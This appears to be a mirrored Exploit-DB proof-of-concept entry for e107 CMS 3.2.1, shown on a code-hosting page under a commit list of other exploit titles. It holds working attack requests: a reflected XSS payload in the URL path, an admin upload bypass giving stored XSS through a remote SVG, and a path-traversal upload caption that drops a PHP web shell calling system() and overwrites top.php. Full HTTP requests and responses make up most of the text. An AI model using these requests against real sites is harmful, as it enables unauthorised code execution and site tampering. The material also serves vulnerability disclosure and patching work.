bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50910.txt
Offensive Security be24992411 DB: 2022-05-12 
42 changes to exploits/shellcodes

UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
ExifTool 12.23 - Arbitrary Code Execution
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
Akka HTTP 10.1.14 - Denial of Service
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
Bookeen Notea - Directory Traversal
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
DLINK DIR850 - Insecure Access Control
DLINK DIR850 - Open Redirect
Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
Tenda HG6 v3.3.0 - Remote Command Injection
Google Chrome 78.0.3904.70 - Remote Code Execution
PyScript - Read Remote Python Source Code
DLINK DAP-1620 A1 v1.01 - Directory Traversal
Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
ImpressCMS v1.4.4 - Unrestricted File Upload
Microfinance Management System 1.0 - 'customer_number' SQLi
WebTareas 2.4 - Blind SQLi (Authenticated)
WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
Magento eCommerce CE v2.3.5-p2 - Blind SQLi
Bitrix24 - Remote Code Execution (RCE) (Authenticated)
CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
e107 CMS v3.2.1 - Multiple Vulnerabilities
Anuko Time Tracker - SQLi (Authenticated)
TLR-2005KSH - Arbitrary File Upload
Explore CMS 1.0 - SQL Injection
Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)
Beehive Forum - Account Takeover
MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Joomla Plugin SexyPolling 2.1.7 - SQLi
WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
2022-05-12 05:01:39 +00:00

221 lines
No EOL
7.4 KiB
Text
Raw Permalink Blame History

# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected - Via adding comment (Authenticated)
# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' >
[...]
User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field
image.png
### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.
Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)
image->media manager->upload a file->Image/File URL
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]
image.png
### Upload restriction bypass (Authenticated [Admin])+RCE
Upload and execute .PHP file
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.
image.png
Media Manager-> Media Upload/Import -> From a remote location
# POC
Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
We can see uploaded PHP file on the server side.
image.png
cmd.php file source:
<?php
system('whoami');
?>
image.png
### Upload restriction bypass (Authenticated [Admin])+ Server file override
Attacker can override example top.php file in the main directory of web application.
Original file top.php in server:
image.png
We can override file via following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
top.php file content was tampered:
Reference in a new issue View git blame Copy permalink